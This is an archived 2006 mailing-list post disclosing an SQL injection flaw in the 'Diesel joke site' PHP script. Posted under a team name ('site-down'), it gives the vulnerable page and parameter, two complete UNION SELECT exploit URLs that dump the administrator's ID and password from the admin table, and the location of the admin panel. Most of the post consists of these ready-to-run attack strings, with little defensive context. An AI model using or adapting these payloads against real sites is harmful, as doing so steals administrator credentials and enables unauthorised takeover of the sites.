OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Sql injection in Diesel joke site script

From: black code (black-cod3hotmail.com)
Date: Sat Jul 01 2006 - 09:52:09 CDT


Sql injection in Diesel joke site

forum type : Diesel joke site
bug found by : black-code
team : site-down
type : Sql injection

####################################################
Sql injection in Diesel joke site

page : category.php

variable : id

####################################################
Exploits :

admin id:
http://www.example.com/path to joke
script/category.php?id=-99%20union%20select%20aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid%20from%20admin/*

pass:
http://www.example.com/path to joke
script/category.php?id=-99%20union%20select%20apass,apass,apass,apass,apass,apass,apass,apass,apass,apass,apass,apass,apass,apass,apass%20from%20admin/*

aid= admin id
apass= pass of the admin
####################################################

path to admin panel :

http://www.example.com/path to jokes/admin

#######################
emails:

black-cod3hotmail.com & gamr-14hotmail.com
#######################

All my respect to our friends , lezr.com , g123g.net

done .. peace

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/